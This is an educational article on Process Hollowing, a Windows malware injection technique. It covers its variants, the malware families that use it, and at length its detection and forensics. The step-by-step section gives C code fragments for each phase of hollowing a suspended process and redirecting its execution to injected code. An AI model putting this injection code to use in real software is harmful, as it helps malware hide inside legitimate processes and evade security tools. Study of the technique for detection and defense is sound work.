Process Hollowing: A Deep Dive into Advanced Malware Injection Techniques
Process Hollowing represents one of the most sophisticated and enduring malware injection techniques in modern cybersecurity. This advanced method allows attackers to execute malicious code within the memory space of legitimate processes, effectively hiding their activities from security tools and analysts. Since its emergence in the early 2010s, Process Hollowing has become a cornerstone technique for malware families ranging from banking trojans to nation-state APT tools.
This comprehensive analysis examines the technical mechanisms, real-world implementations, and defensive strategies surrounding Process Hollowing, providing both security professionals and developers with the knowledge needed to understand and counter this persistent threat.
Understanding Process Hollowing fundamentals
Process Hollowing, also known as RunPE or Hollow Process Injection, is a code injection technique classified under MITRE ATT&CK framework as T1055.012. The technique involves creating a legitimate process in a suspended state, removing its original executable code from memory, and replacing it with malicious code before resuming execution. This creates a scenario where the process appears legitimate to monitoring tools while executing entirely different code.
The fundamental appeal of Process Hollowing lies in its stealth characteristics. Unlike traditional malware that creates new processes, Process Hollowing leverages existing, trusted process names and structures. When security tools scan running processes, they observe familiar names like svchost.exe or explorer.exe rather than suspicious executables. This camouflage effect makes detection significantly more challenging, particularly for signature-based security solutions.
The technique operates on several key principles: First, it exploits the Windows process creation mechanism by intercepting processes during their initialization phase. Second, it manipulates virtual memory management to replace legitimate code with malicious payloads. Third, it preserves the process’s external appearance while fundamentally altering its behavior. Finally, it leverages legitimate Windows APIs to perform these operations, making the activity appear as normal system behavior.
Technical architecture and memory management
Process Hollowing depends on intimate knowledge of Windows process architecture and memory management. Every Windows process contains a Process Environment Block (PEB), which serves as a critical data structure containing process metadata, including the ImageBaseAddress at offset +0x08. This address points to the location where the process’s executable image is loaded in memory.
The technique exploits the relationship between the PEB and Virtual Address Descriptors (VAD), which describe memory regions within a process. Under normal circumstances, both the PEB and VAD reference the same process image. However, after Process Hollowing, the reference to the original image disappears from the VAD while remaining in the PEB, creating a detectable discrepancy.
Memory protection mechanisms play a crucial role in Process Hollowing implementation. Windows uses various protection flags to control memory access, including PAGE_EXECUTE_READ for executable code and PAGE_READWRITE for data. Process Hollowing typically requires PAGE_EXECUTE_READWRITE permissions during injection, which represents an abnormal memory state that can serve as a detection indicator.
The PE (Portable Executable) file format provides the structural foundation for Process Hollowing. Key PE components include the DOS header with its MZ signature, the PE header containing the COFF file header, and the Optional Header specifying the entry point and image base address. Section headers define virtual addresses, sizes, and characteristics of different code and data sections.
Base relocation processing becomes critical when the malicious executable cannot be loaded at its preferred ImageBase address. The relocation table contains entries that must be processed to adjust memory addresses, ensuring the injected code functions correctly regardless of its actual memory location.
Step-by-step technical breakdown
The Process Hollowing technique follows a precise sequence of operations, each serving a specific purpose in the injection process. Understanding this sequence is essential for both implementing detection mechanisms and analyzing malware behavior.
Phase 1: Process creation and suspension
The attack begins with creating a target process in a suspended state using the CreateProcess Windows API. The critical parameter is the CREATE_SUSPENDED flag, which prevents the process from executing while maintaining all necessary process structures.
PROCESS_INFORMATION pi;STARTUPINFO si = {0};si.cb = sizeof(STARTUPINFO);
BOOL result = CreateProcess( NULL, // Application name targetPath, // Command line (legitimate process) NULL, // Process security attributes NULL, // Thread security attributes FALSE, // Inherit handles CREATE_SUSPENDED, // Critical: suspend process creation NULL, // Environment NULL, // Current directory &si, // Startup info &pi // Process info output);Phase 2: Memory analysis and PEB extraction
The next phase involves analyzing the target process’s memory structure to locate the original executable image. This requires querying the Process Environment Block (PEB) to determine where the legitimate executable is loaded in memory.
PROCESS_BASIC_INFORMATION pbi;NTSTATUS status = NtQueryInformationProcess( pi.hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), NULL);
// Calculate PEB ImageBaseAddress offsetDWORD pebImageBaseOffset = (DWORD)pbi.PebBaseAddress + 0x08;LPVOID destImageBase;
ReadProcessMemory( pi.hProcess, (LPCVOID)pebImageBaseOffset, &destImageBase, sizeof(LPVOID), NULL);Phase 3: Memory unmapping and hollowing
The hollowing phase involves unmapping the original executable from the target process’s memory. This is accomplished using the NtUnmapViewOfSection API, which removes the legitimate code while preserving the process structure.
HMODULE hNTDLL = GetModuleHandle("ntdll");typedef NTSTATUS (WINAPI *pNtUnmapViewOfSection)(HANDLE, PVOID);pNtUnmapViewOfSection NtUnmapViewOfSection = (pNtUnmapViewOfSection)GetProcAddress(hNTDLL, "NtUnmapViewOfSection");
NTSTATUS unmapStatus = NtUnmapViewOfSection(pi.hProcess, destImageBase);Phase 4: Malicious code injection
With the legitimate code removed, the attacker allocates new memory space and writes the malicious executable. This involves copying both the PE headers and individual sections to their appropriate memory locations.
// Allocate memory for malicious executablePVOID pRemoteImage = VirtualAllocEx( pi.hProcess, destImageBase, maliciousHeaders->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Write PE headersWriteProcessMemory( pi.hProcess, pRemoteImage, maliciousBuffer, maliciousHeaders->OptionalHeader.SizeOfHeaders, NULL);
// Write each sectionfor (DWORD i = 0; i < maliciousHeaders->FileHeader.NumberOfSections; i++) { PVOID sectionDestination = (PVOID)((DWORD)pRemoteImage + sections[i].VirtualAddress);
WriteProcessMemory( pi.hProcess, sectionDestination, &maliciousBuffer[sections[i].PointerToRawData], sections[i].SizeOfRawData, NULL );}Phase 5: Execution context modification
The final phase involves modifying the thread context to redirect execution to the malicious code’s entry point. This ensures that when the process resumes, it will execute the injected payload instead of the original code.
CONTEXT context = {0};context.ContextFlags = CONTEXT_INTEGER;GetThreadContext(pi.hThread, &context);
// Calculate new entry pointDWORD entryPoint = (DWORD)pRemoteImage + maliciousHeaders->OptionalHeader.AddressOfEntryPoint;
// Set entry point register (architecture-dependent)context.Eax = entryPoint; // x86 architecture// context.Rcx = entryPoint; // x64 architecture
SetThreadContext(pi.hThread, &context);ResumeThread(pi.hThread);Critical Windows APIs and their roles
Process Hollowing relies on a specific set of Windows APIs, each serving a crucial function in the injection process. Understanding these APIs is essential for both implementing detection mechanisms and analyzing malware behavior.
Process management APIs form the foundation of the technique. CreateProcess establishes the initial process structure, while NtUnmapViewOfSection removes the legitimate executable. VirtualAllocEx allocates memory in the target process with specific protection flags, and WriteProcessMemory transfers the malicious payload.
Thread context management APIs control process execution flow. GetThreadContext retrieves the current thread state, SetThreadContext modifies the execution context to redirect to malicious code, and ResumeThread begins execution of the injected payload.
Process information APIs provide access to internal process structures. NtQueryInformationProcess retrieves the PEB address, while ReadProcessMemory and WriteProcessMemory access process memory contents.
The API call sequence typically follows a predictable pattern: process creation, memory analysis, unmapping, allocation, injection, context modification, and execution. This sequence creates a distinctive behavioral signature that can be leveraged for detection purposes.
Advanced techniques and variations
Process Hollowing has evolved significantly since its initial implementation, with attackers developing numerous variations to evade detection and improve effectiveness. These advanced techniques demonstrate the continuous arms race between malware authors and security professionals.
Process Doppelgänging
Process Doppelgänging represents a sophisticated evolution that exploits Windows Transactional NTFS (TxF) features. This technique creates a volatile executable file that exists only within a transaction, never persisting to disk in its malicious form.
The process begins with creating an NTFS transaction using CreateTransaction, followed by creating a transacted file with CreateFileTransacted. The malicious payload is written to this transacted file, which is then used to create an image section through NtCreateSection. The process is created using NtCreateProcessEx with the image section, and finally, the transaction is rolled back, removing all traces of the malicious file.
Technical advantages include completely fileless execution and avoidance of highly monitored APIs. However, the technique relies on deprecated TxF APIs and has been partially mitigated by Microsoft security updates.
Process Herpaderping
Process Herpaderping exploits timing gaps in Windows security callbacks by modifying executable files after they’re mapped but before security products can scan them. This technique creates a legitimate file, maps it as an image section, creates a process, then overwrites the file with benign content before security callbacks fire.
The timing exploitation occurs because process creation callbacks fire when the first thread is inserted, not when the process object is created. This creates a window where attackers can modify the backing file after mapping but before scanning, causing security products to scan the modified benign content while the malicious code remains in memory.
Process Ghosting
Process Ghosting creates processes from image sections of deleted files, exploiting Windows’ ability to maintain image sections in memory even after their backing files are removed. The technique marks a file for deletion, writes malicious content, creates an image section, deletes the file, then creates a process using the orphaned image section.
This approach makes post-creation file scanning impossible, as attempts to open the file fail with STATUS_FILE_DELETED. The technique provides completely fileless execution while being extremely difficult to analyze or scan.
Real-world malware implementations
Process Hollowing has been extensively adopted by diverse malware families, demonstrating its effectiveness across different attack scenarios and target environments. Understanding these real-world implementations provides insight into the technique’s practical applications and evolution.
Banking trojans and information stealers
Agent Tesla represents one of the most prolific malware families using Process Hollowing. This malware-as-a-service platform uses sophisticated multi-stage unpacking and steganography techniques, embedding PE files within PNG resources. Recent campaigns have targeted victims through phishing emails containing malicious CHM files that exploit CVE-2017-11882 vulnerabilities. The malware specifically targets dasHost.exe for process hollowing, using the complete API sequence of VirtualAllocEx, WriteProcessMemory, SetThreadContext, and ResumeThread.
Emotet demonstrates the technique’s integration into major botnet operations. After its 2021 resurrection, Emotet enhanced its process hollowing capabilities, frequently targeting certutil.exe for injection. The malware copies legitimate executables to the %Temp% directory before hollowing them, and has been observed injecting Nir Sofer’s password recovery tools. Between February and March 2022, Emotet attacks increased threefold, with 9,086 users affected compared to 2,847 in the previous period.
TrickBot evolved from a banking trojan to an enterprise-focused crimeware platform, utilizing process hollowing for persistence and evasion. The malware’s Anchor project variant demonstrates advanced forensic evasion techniques, including DNS communication channels and sophisticated anti-analysis mechanisms. TrickBot has been adopted by nation-state actors, including the Lazarus group for delivering PowerRatankba backdoor.
Advanced Persistent Threat (APT) implementations
Dtrack malware, attributed to North Korean APT groups, specifically targets predefined system processes from the %SYSTEM32% directory for hollowing. The malware demonstrates sophisticated process selection algorithms, choosing targets based on system architecture and available processes.
ISMInjector, developed by the OilRig group, specifically targets RegASM.exe for process hollowing, demonstrating the technique’s adoption by Iran-linked APT groups. The tool shows careful consideration of target selection to avoid detection while maintaining functionality.
Ransomware and loader families
Ryuk Ransomware incorporates process hollowing into its encryption routines, using the technique to hide critical components of the ransomware operation. The malware’s high-profile attacks on healthcare and municipal systems demonstrate the technique’s effectiveness in targeted ransomware scenarios.
Gootloader employs JavaScript-based initial compromise followed by process hollowing into ImagingDevices.exe, showing how modern malware combines multiple techniques for maximum effectiveness. The malware’s targeting of specific Windows processes demonstrates detailed knowledge of system architecture.
Detection and prevention strategies
Effective defense against Process Hollowing requires a multi-layered approach combining behavioral analysis, memory forensics, and advanced monitoring capabilities. Traditional signature-based detection proves insufficient against this technique, necessitating more sophisticated approaches.
Behavioral detection mechanisms
Process creation monitoring forms the foundation of behavioral detection. Security teams should monitor for processes created with the CREATE_SUSPENDED flag, unusual parent-child relationships, and processes running under unexpected user accounts. Event logging through Windows Event ID 4688 or Sysmon Event ID 1 provides the necessary data for this analysis.
API call sequence monitoring involves tracking the specific sequence of APIs used in Process Hollowing. The predictable pattern of CreateProcess, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext, and ResumeThread creates a distinctive signature that can be detected through API hooking or ETW (Event Tracing for Windows) monitoring.
Memory analysis techniques focus on detecting the artifacts left by Process Hollowing. This includes identifying processes with unusual memory characteristics, such as regions marked with PAGE_EXECUTE_READWRITE permissions, and detecting discrepancies between Process Environment Block (PEB) and Virtual Address Descriptor (VAD) information.
Advanced detection tools
Hollows Hunter, developed by hasherezade, provides specialized detection capabilities for Process Hollowing. The tool scans all running processes for potentially malicious implants, automatically detecting replaced or implanted PE files, shellcodes, and hooks. It can automatically dump suspicious processes for detailed analysis.
Volatility Framework offers comprehensive memory forensics capabilities through plugins like hollowfind, which detects discrepancies between VAD and PEB information, and malfind, which identifies memory segments with suspicious protection settings. The framework’s procdump plugin allows extraction of suspicious processes for detailed analysis.
Enterprise EDR solutions have evolved to incorporate Process Hollowing detection capabilities. Microsoft Defender for Endpoint uses Extra Create Parameters (ECPs) to detect legacy process creation syscalls and monitors for process creation properties and file state changes. These solutions provide real-time detection and response capabilities.
Memory forensics and analysis
Volatility analysis workflow begins with identifying suspicious processes using the pslist command, followed by comparing PEB and VAD information through hollowfind. The malfind plugin identifies memory regions with suspicious characteristics, while procdump extracts processes for detailed analysis.
Fuzzy hashing techniques using tools like ssdeep can compare processes in memory against their filesystem originals, identifying modifications that indicate Process Hollowing. This approach proves particularly effective for detecting subtle modifications that might escape other detection methods.
Memory artifacts analysis focuses on specific indicators including VAD tags showing VadS or VadF instead of Vad, memory protection flags of PAGE_EXECUTE_READWRITE instead of PAGE_EXECUTE_WRITECOPY, and discrepancies between process images on disk and in memory.
Prevention and hardening strategies
System hardening involves implementing principle of least privilege, restricting execution of high-risk processes with administrative rights, and using User Account Control (UAC) restrictions. Process Mitigation Policies can restrict process capabilities and reduce attack surface.
Memory protection features include enabling Memory Integrity through Hypervisor-Protected Code Integrity (HVCI), implementing Address Space Layout Randomization (ASLR), and using Control Flow Guard (CFG) for exploit mitigation. These features make Process Hollowing more difficult to execute successfully.
Application control mechanisms such as Windows Defender Application Control (WDAC) and application whitelisting can prevent execution of unauthorized binaries. These controls create additional barriers that attackers must overcome to deploy Process Hollowing techniques.
Forensic analysis and incident response
When Process Hollowing attacks are suspected, incident response teams must employ specialized forensic techniques to identify, analyze, and contain the threat. This requires understanding both the technical artifacts left by the technique and the appropriate tools for their analysis.
Live system analysis
Process analysis begins with examining running processes for anomalies. Process Explorer and Process Hacker can identify unusual process characteristics, parent-child relationships, and memory usage patterns. Analysts should look for processes running under unexpected accounts, consuming unusual amounts of memory, or exhibiting network activity inconsistent with their supposed function.
Memory acquisition must be performed quickly to preserve volatile evidence. Tools like DumpIt, Belkasoft Live RAM Capturer, and specialized forensic platforms can capture complete memory images while maintaining chain of custody requirements. The timing of memory acquisition is critical, as Process Hollowing artifacts may be modified or destroyed by continued system operation.
Post-incident analysis
Timeline reconstruction involves correlating process creation events, memory allocations, and network activity to understand the attack sequence. This analysis helps determine the initial compromise vector, lateral movement patterns, and potential data exfiltration.
Malware extraction and analysis requires careful handling of injected payloads. Extracted processes must be analyzed in isolated environments to prevent further compromise while allowing detailed examination of capabilities and command-and-control infrastructure.
Future challenges and evolution
The Process Hollowing technique continues to evolve in response to improved detection mechanisms and changes in operating system architecture. Understanding these evolutionary trends helps security professionals prepare for future variants and develop more effective countermeasures.
Emerging variations
AI-powered obfuscation represents a significant future challenge, with attackers potentially using machine learning to optimize injection techniques and evade detection. This could lead to more sophisticated timing manipulation and behavior modification.
Cloud and containerized environments present new opportunities for Process Hollowing variants. Container escape techniques and cloud-native process injection methods may emerge as attackers adapt to modern infrastructure.
Hardware-based detection evasion may become more prevalent as attackers develop techniques to bypass hardware-enforced security features like Intel CET (Control-flow Enforcement Technology) and ARM Pointer Authentication.
Defensive evolution
Behavioral AI and machine learning will likely play an increasingly important role in Process Hollowing detection. These technologies can identify subtle patterns and anomalies that traditional rule-based systems might miss.
Hardware-assisted security features such as Intel TXT (Trusted Execution Technology) and ARM TrustZone provide new opportunities for detecting and preventing process injection attacks at the hardware level.
Zero-trust architecture principles will influence Process Hollowing defenses, with increased emphasis on continuous verification and least-privilege access controls.
Conclusion
Process Hollowing represents a sophisticated and enduring threat in the cybersecurity landscape. Its effectiveness stems from the fundamental exploitation of Windows process management mechanisms, allowing attackers to hide malicious code within legitimate processes. The technique’s adoption by diverse threat actors—from commodity malware to nation-state APTs—demonstrates its continued relevance and effectiveness.
Technical mastery of Process Hollowing requires deep understanding of Windows internals, PE file structure, and memory management. Security professionals must comprehend these technical details to develop effective detection and prevention strategies. The technique’s evolution into variants like Process Doppelgänging, Process Herpaderping, and Process Ghosting shows the continuous innovation in this space.
Defensive success against Process Hollowing requires a comprehensive approach combining behavioral analysis, memory forensics, and advanced monitoring capabilities. Traditional signature-based detection proves insufficient, necessitating investment in sophisticated EDR solutions and specialized forensic tools. The integration of machine learning and AI-powered detection systems represents the future of defense against these advanced techniques.
Ongoing vigilance is essential as Process Hollowing techniques continue to evolve. Security teams must stay informed about new variants, maintain updated detection capabilities, and regularly test their defenses against emerging threats. The arms race between attackers and defenders ensures that Process Hollowing will remain a significant concern for cybersecurity professionals.
Understanding Process Hollowing in its full technical depth enables security professionals to better protect their organizations while providing developers with the knowledge needed to build more secure applications and systems. This comprehensive understanding serves as the foundation for effective cybersecurity defense in an increasingly complex threat landscape.
This analysis is based on extensive research from security vendors, academic sources, and the cybersecurity community. All technical information is provided for educational purposes only.